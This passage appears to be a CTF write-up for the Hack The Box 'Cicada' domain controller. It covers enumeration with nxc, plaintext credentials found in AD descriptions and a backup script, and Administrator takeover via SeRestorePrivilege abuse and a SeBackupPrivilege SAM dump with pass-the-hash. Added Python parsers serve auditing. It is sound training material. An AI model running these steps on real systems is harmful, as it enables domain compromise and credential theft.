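    r"\s+(?P<badpw>\d+)\s*(?P<desc>.*)$"
)

# Words that, in an AD description field, usually mean a secret was parked there.
_SECRET_HINTS = re.compile(r"\b(pass(word|wd)?|pwd|cred(ential)?s?|secret|pin)\b", re.IGNORECASE)


def strip_prefix(line):
    """Remove the protocol/ip/port/hostname columns nxc prints on every line."""
    return _PREFIX.sub("", line.strip())


def rid_brute_users(output, include_machine_accounts=False):
    """Account names with SidTypeUser, in output order (what users.txt should hold)."""
    users = []
    for line in output.splitlines():
        m = _RID_ROW.match(strip_prefix(line))
        if not m or m.group("sidtype") != "SidTypeUser":
            continue
        name = m.group("name")
        if name.endswith("$") and not include_machine_accounts:
            continue  # computer accounts carry random machine passwords; skip by default
        users.append(name)
    return users


def suspicious_descriptions(output):
    """(user, description) pairs from --users output whose description hints at a secret."""
    hits = []
    for line in output.splitlines():
        m = _USER_ROW.match(strip_prefix(line))
        if not m:
            continue
        desc = m.group("desc").strip()
        if desc and _SECRET_HINTS.search(desc):
            hits.append((m.group("user"), desc))
    return hits


# Constructed samples. Most rows mirror the write-up's output; the "svc backup"
# account (a name with a space) is made up to show why the regex beats awk.
RID_BRUTE_SAMPLE = r"""
SMB  10.129.231.149  445  CICADA-DC  [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB  10.129.231.149  445  CICADA-DC  [+] cicada.htb\guest:
SMB  10.129.231.149  445  CICADA-DC  500: CICADA\Administrator (SidTypeUser)
SMB  10.129.231.149  445  CICADA-DC  501: CICADA\Guest (SidTypeUser)
SMB  10.129.231.149  445  CICADA-DC  502: CICADA\krbtgt (SidTypeUser)
SMB  10.129.231.149  445  CICADA-DC  512: CICADA\Domain Admins (SidTypeGroup)
SMB  10.129.231.149  445  CICADA-DC  1000: CICADA\CICADA-DC$ (SidTypeUser)
SMB  10.129.231.149  445  CICADA-DC  1104: CICADA\john.smoulder (SidTypeUser)
SMB  10.129.231.149  445  CICADA-DC  1109: CICADA\Dev Support (SidTypeGroup)
SMB  10.129.231.149  445  CICADA-DC  1610: CICADA\svc backup (SidTypeUser)
"""

USERS_SAMPLE = r"""
SMB  10.129.231.149  445  CICADA-DC  -Username-      -Last PW Set-        -BadPW-  -Description-
SMB  10.129.231.149  445  CICADA-DC  Administrator   2024-08-26 20:08:03  0        Built-in account for administering the computer/domain
SMB  10.129.231.149  445  CICADA-DC  krbtgt          2024-03-14 11:14:10  0        Key Distribution Center Service Account
SMB  10.129.231.149  445  CICADA-DC  john.smoulder   2024-03-14 12:17:29  0
SMB  10.129.231.149  445  CICADA-DC  david.orelious  2024-03-14 12:17:29  0        Just in case I forget my password is aRt$Lp#7t*VQ!3
SMB  10.129.231.149  445  CICADA-DC  [*] Enumerated 8 local users: CICADA
"""

if __name__ == "__main__":
    print("\n".join(rid_brute_users(RID_BRUTE_SAMPLE)))
    for user, desc in suspicious_descriptions(USERS_SAMPLE):
        print(f"[!] {user}: {desc}")
```

Feed it the saved tool output (`rid_brute_users(open("ridbrute.txt").read())`) rather than a live pipeline; the same description audit, run from the defending side with `--users` or an LDAP export, is how you find the parked credential before somebody else does.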
If there are going to be rogue plain text credentials, this is where I always check (I recently did a CTF where the user:pass was in the ldapsearch output, so keep an open mind, but add this check to your list):

```
┌──(root㉿user)-[/home/user]
└─# nxc smb $target -u michael.wrightson -p 'Cicada$M6Corpb*@Lp#nZp!8' --users
SMB         10.129.231.149  445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.129.231.149  445    CICADA-DC        [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8
SMB         10.129.231.149  445    CICADA-DC        -Username-                    -Last PW Set-       -BadPW- -Description-
SMB         10.129.231.149  445    CICADA-DC        Administrator                 2024-08-26 20:08:03 0       Built-in account for administering the computer/domain
SMB         10.129.231.149  445    CICADA-DC        Guest                         2024-08-28 17:26:56 0       Built-in account for guest access to the computer/domain
SMB         10.129.231.149  445    CICADA-DC        krbtgt                        2024-03-14 11:14:10 0       Key Distribution Center Service Account
SMB         10.129.231.149  445    CICADA-DC        john.smoulder                 2024-03-14 12:17:29 0
SMB         10.129.231.149  445    CICADA-DC        sarah.dantelia                2024-03-14 12:17:29 0
SMB         10.129.231.149  445    CICADA-DC        michael.wrightson             2024-03-14 12:17:29 0
SMB         10.129.231.149  445    CICADA-DC        david.orelious                2024-03-14 12:17:29 0       Just in case I forget my password is aRt$Lp#7t*VQ!3
SMB         10.129.231.149  445    CICADA-DC        emily.oscars                  2024-08-22 21:20:17 0
SMB         10.129.231.149  445    CICADA-DC        [*] Enumerated 8 local users: CICADA
```

We now have this new credential: david.orelious:aRt$Lp#7t*VQ!3

I run the share enumeration and the spider module against his account:

```
┌──(root㉿user)-[/home/user]
└─# nxc smb $target -u david.orelious -p 'aRt$Lp#7t*VQ!3' --shares
SMB         10.129.231.149  445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.129.231.149  445    CICADA-DC        [+] cicada.htb\david.orelious:aRt$Lp#7t*VQ!3
SMB         10.129.231.149  445    CICADA-DC        [*] Enumerated shares
SMB         10.129.231.149  445    CICADA-DC        Share           Permissions     Remark
SMB         10.129.231.149  445    CICADA-DC        -----           -----------     ------
SMB         10.129.231.149  445    CICADA-DC        ADMIN$                          Remote Admin
SMB         10.129.231.149  445    CICADA-DC        C$                              Default share
SMB         10.129.231.149  445    CICADA-DC        DEV             READ
SMB         10.129.231.149  445    CICADA-DC        HR              READ
SMB         10.129.231.149  445    CICADA-DC        IPC$            READ            Remote IPC
SMB         10.129.231.149  445    CICADA-DC        NETLOGON        READ            Logon server share
SMB         10.129.231.149  445    CICADA-DC        SYSVOL          READ            Logon server share

┌──(root㉿user)-[/home/user]
└─# nxc smb $target -u david.orelious -p 'aRt$Lp#7t*VQ!3' -M spider_plus
SMB         10.129.231.149  445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.129.231.149  445    CICADA-DC        [+] cicada.htb\david.orelious:aRt$Lp#7t*VQ!3
SPIDER_PLUS 10.129.231.149  445    CICADA-DC        [*] Started module spidering_plus with the following options:
SPIDER_PLUS 10.129.231.149  445    CICADA-DC        [*]  DOWNLOAD_FLAG: False
SPIDER_PLUS 10.129.231.149  445    CICADA-DC        [*]     STATS_FLAG: True
SPIDER_PLUS 10.129.231.149  445    CICADA-DC        [*] EXCLUDE_FILTER: ['print$', 'ipc$']
SPIDER_PLUS 10.129.231.149  445    CICADA-DC        [*]   EXCLUDE_EXTS: ['ico', 'lnk']
SPIDER_PLUS 10.129.231.149  445    CICADA-DC        [*]  MAX_FILE_SIZE: 50 KB
SPIDER_PLUS 10.129.231.149  445    CICADA-DC        [*]  OUTPUT_FOLDER: /root/.nxc/modules/nxc_spider_plus
SMB         10.129.231.149  445    CICADA-DC        [*] Enumerated shares
SMB         10.129.231.149  445    CICADA-DC        Share           Permissions     Remark
SMB         10.129.231.149  445    CICADA-DC        -----           -----------     ------
SMB         10.129.231.149  445    CICADA-DC        ADMIN$                          Remote Admin
SMB         10.129.231.149  445    CICADA-DC        C$                              Default share
SMB         10.129.231.149  445    CICADA-DC        DEV             READ
SMB         10.129.231.149  445    CICADA-DC        HR              READ
SMB         10.129.231.149  445    CICADA-DC        IPC$            READ            Remote IPC
SMB         10.129.231.149  445    CICADA-DC        NETLOGON        READ            Logon server share
SMB         10.129.231.149  445    CICADA-DC        SYSVOL          READ            Logon server share
SPIDER_PLUS 10.129.231.149  445    CICADA-DC        [+] Saved share-file metadata to "/root/.nxc/modules/nxc_spider_plus/10.129.231.149.json".
SPIDER_PLUS 10.129.231.149  445    CICADA-DC        [*] SMB Shares:           7 (ADMIN$, C$, DEV, HR, IPC$, NETLOGON, SYSVOL)
SPIDER_PLUS 10.129.231.149  445    CICADA-DC        [*] SMB Readable Shares:  5 (DEV, HR, IPC$, NETLOGON, SYSVOL)
SPIDER_PLUS 10.129.231.149  445    CICADA-DC        [*] SMB Filtered Shares:  1
SPIDER_PLUS 10.129.231.149  445    CICADA-DC        [*] Total folders found:  33
SPIDER_PLUS 10.129.231.149  445    CICADA-DC        [*] Total files found:    12
SPIDER_PLUS 10.129.231.149  445    CICADA-DC        [*] File size average:    1.09 KB
SPIDER_PLUS 10.129.231.149  445    CICADA-DC        [*] File size min:        23 B
SPIDER_PLUS 10.129.231.149  445    CICADA-DC        [*] File size max:        5.22 KB
```

Whilst examining the output I noted there was a file in the "DEV" share: Backup_script.ps1. I then downloaded the file:

```
┌──(root㉿user)-[/home/user]
└─# nxc smb $target -u david.orelious -p 'aRt$Lp#7t*VQ!3' --share "DEV" --get-file "Backup_script.ps1" ./BackUp.ps1
SMB         10.129.231.149  445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.129.231.149  445    CICADA-DC        [+] cicada.htb\david.orelious:aRt$Lp#7t*VQ!3
SMB         10.129.231.149  445    CICADA-DC        [*] Copying "Backup_script.ps1" to "./BackUp.ps1"
SMB         10.129.231.149  445    CICADA-DC        [+] File "Backup_script.ps1" was downloaded to "./BackUp.ps1"
```

Contents of Backup_script.ps1:

```powershell
$sourceDirectory = "C:\smb"
$destinationDirectory = "D:\Backup"

$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)

$dateStamp = Get-Date -Format "yyyyMMdd_HHmmss"
$backupFileName = "smb_backup_$dateStamp.zip"
$backupFilePath = Join-Path -Path $destinationDirectory -ChildPath $backupFileName

Compress-Archive -Path $sourceDirectory -DestinationPath $backupFilePath
Write-Host "Backup completed successfully. Backup file saved to: $backupFilePath"
```

This is a script to perform backups of emily.oscars' SMB share, and there is a plain text credential stored in it: emily.oscars:Q!3@Lp#M6b*7t*Vt

I then confirmed that this user had WinRM access:

```
┌──(root㉿user)-[/home/user]
└─# nxc winrm $target -u emily.oscars -p 'Q!3@Lp#M6b*7t*Vt'
WINRM       10.129.231.149  5985   CICADA-DC        [*] Windows Server 2022 Build 20348 (name:CICADA-DC) (domain:cicada.htb)
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from cryptography.hazmat.primitives.ciphers.algorithms in 48.0.0.
  arc4 = algorithms.ARC4(self._key)
WINRM       10.129.231.149  5985   CICADA-DC        [+] cicada.htb\emily.oscars:Q!3@Lp#M6b*7t*Vt (Pwn3d!)
```

A quick and easy first check for privilege escalation is to list the account's privileges:

```
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabl
```

Now: there are TWO WAYS to escalate privilege to administrator on the machine.

## SeRestorePrivilege (first way to become administrator)

Grab the Invoke-SeRestoreAbuse.ps1 script from its GitHub repo and transfer it to the target machine. Below is the output demonstrating how to use SeRestorePrivilege to get code execution as administrator.
```
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> Import-Module ./Invoke-SeRestoreAbuse.ps1
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> Invoke-SeRestoreAbuse -Command 'cmd /c powershell -c "whoami > C:\Users\emily.oscars.CICADA\Documents\foo.txt"'
[+] SeRestorePrivilege privilege enabled
[+] ImagePath set to: cmd /c powershell -c "whoami > C:\Users\emily.oscars.CICADA\Documents\foo.txt"
[+] Seclogon service started
[+] ImagePath restored to: %windir%\system32\svchost.exe -k netsvcs -p
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> dir

    Directory: C:\Users\emily.oscars.CICADA\Documents

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         3/23/2026   7:31 AM             44 foo.txt
-a----         3/23/2026   6:01 AM           6537 Invoke-SeRestoreAbuse.ps1

*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> type foo.txt
nt authority\system
```

You can use this script to execute any command as administrator; I simply changed the administrator's password with the syntax below.

```
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> Invoke-SeRestoreAbuse -Command 'net user Administrator P@ssword123!'
[+] SeRestorePrivilege privilege enabled
[+] ImagePath set to: net user Administrator P@ssword123!
[+] Seclogon service started
[+] ImagePath restored to: %windir%\system32\svchost.exe -k netsvcs -
```

You can now confirm that the password change was successful via LDAP:

```
┌──(root㉿user)-[/home/…/HTBox/CPTS/HTBox/tools]
└─# nxc ldap $target -u administrator -p P@ssword123!
LDAP        10.129.231.149  389    CICADA-DC        [*] Windows Server 2022 Build 20348 (name:CICADA-DC) (domain:cicada.htb)
LDAP        10.129.231.149  389    CICADA-DC        [+] cicada.htb\administrator:P@ssword123! (Pwn3d!)
```

You could now log in as the administrator, use a Netexec module (-M sam or -M ntdsutil) to dump the hashes for the domain, or even send yourself a reverse shell. The possibilities are endless as you have RCE as the administrator.
## SeBackupPrivilege (second way to become administrator)

A user with this privilege can back up the Windows registry hives, specifically the SAM, SYSTEM and SECURITY hives. Saving these hives is a post-exploitation technique used to extract the machine's "boot key", which then allows us to decrypt and dump local user credentials and cached password hashes for offline cracking or lateral movement. Note: these are LOCAL credentials.

Firstly, we are going to copy the SAM and SYSTEM files (I attempted the SECURITY hive too but this failed, which doesn't matter):

```
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> reg.exe save hklm\sam C:\Users\emily.oscars.CICADA\Documents\sam.save
The operation completed successfully.
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> reg.exe save hklm\security C:\Users\emily.oscars.CICADA\Documents\security.save
reg.exe : ERROR: Access is denied.
    + CategoryInfo          : NotSpecified: (ERROR: Access is denied.:String) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> reg.exe save hklm\system C:\Users\emily.oscars.CICADA\Documents\system.save
The operation completed successfully.
```

Secondly, we want to download the SAM and SYSTEM files to our Kali machine. Evil-WinRM makes this very easy with its download command.

```
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> dir

    Directory: C:\Users\emily.oscars.CICADA\Documents

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         3/23/2026   2:44 AM          49152 sam.save
-a----         3/23/2026   2:44 AM       18558976 system.save

*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> download sam.save
Info: Downloading C:\Users\emily.oscars.CICADA\Documents\sam.save to sam.save
Info: Download successful!
```
```
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> download system.save
Info: Downloading C:\Users\emily.oscars.CICADA\Documents\system.save to system.save
Progress: 23% : |▓▒░░░░░░░░|
```

Run impacket-secretsdump with the following syntax to obtain the hashes:

```
┌──(root㉿user)-[/home/user/bhs]
└─# impacket-secretsdump -sam sam.save -system system.save LOCAL
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[*] Target system bootKey: 0x3c2b033757a49110a9ee680b46e8d620
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Cleaning up...
```

Once you have the hash of any target user, you can authenticate with it as if it were a plain text password to log in as them (pass the hash attack):

```
┌──(root㉿user)-[/home/user/bhs]
└─# evil-winrm -i $target -u administrator -H 2b87e7c93a3e8a0ea4a581937016f341

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
cicada\administrator
```
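secretsdump prints one `user:rid:lmhash:nthash:::` row per account, and the rows above already tell a defender two things without any cracking: Guest and DefaultAccount carry the NT hash of the empty password (`31d6cfe0...`), and every LM field is the empty-LM constant (`aad3b435...`), so LM storage is off. The script below is an added example, not Impacket's code and not part of the write-up, that parses such a dump and reports blank passwords, LM hashes still stored, and one NT hash shared by several accounts (password reuse). The first three rows of the sample are the dump above; the `backupadmin` row is constructed and deliberately reuses Administrator's hash.

```python
"""Audit a secretsdump-style SAM dump (user:rid:lmhash:nthash:::) for findings a
defender cares about: blank passwords, LM hashes still stored, and the same NT
hash shared by several accounts (password reuse). Added example; not Impacket
code and not from the write-up."""
import re
from collections import defaultdict

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM field when LM storage is off / password empty
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of the empty password

_SAM_ROW = re.compile(
    r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::$",
    re.IGNORECASE,
)


def parse_sam_dump(text):
    """Return one dict per hash row; secretsdump's [*] status lines are skipped."""
    rows = []
    for line in text.splitlines():
        m = _SAM_ROW.match(line.strip())
        if m:
            rows.append({
                "user": m.group("user"),
                "rid": int(m.group("rid")),
                "lm": m.group("lm").lower(),
                "nt": m.group("nt").lower(),
            })
    return rows


def audit(rows):
    """Return (user, finding) pairs, one per issue, in row order."""
    findings = []
    by_nt = defaultdict(list)          # non-empty NT hash -> accounts that share it
    for r in rows:
        if r["nt"] != EMPTY_NT:
            by_nt[r["nt"]].append(r["user"])
    for r in rows:
        if r["nt"] == EMPTY_NT:
            findings.append((r["user"], "blank password (empty NT hash)"))
        if r["lm"] != EMPTY_LM:
            findings.append((r["user"], "LM hash stored (trivially crackable)"))
        peers = [u for u in by_nt.get(r["nt"], []) if u != r["user"]]
        if peers:
            findings.append((r["user"], "password reuse: same NT hash as " + ", ".join(peers)))
    return findings


# Constructed sample: the first three rows are the write-up's secretsdump output;
# "backupadmin" is made up and given Administrator's NT hash to show reuse detection.
SAMPLE_DUMP = """\
[*] Target system bootKey: 0x3c2b033757a49110a9ee680b46e8d620
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
backupadmin:1001:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341:::
[*] Cleaning up...
"""

if __name__ == "__main__":
    for user, finding in audit(parse_sam_dump(SAMPLE_DUMP)):
        print(f"[!] {user}: {finding}")
```

The reuse check is the one that matters most on a real estate: a local Administrator hash that also appears on other hosts (or under other local accounts) is exactly what makes pass-the-hash spread, and LAPS-style unique local admin passwords are the fix.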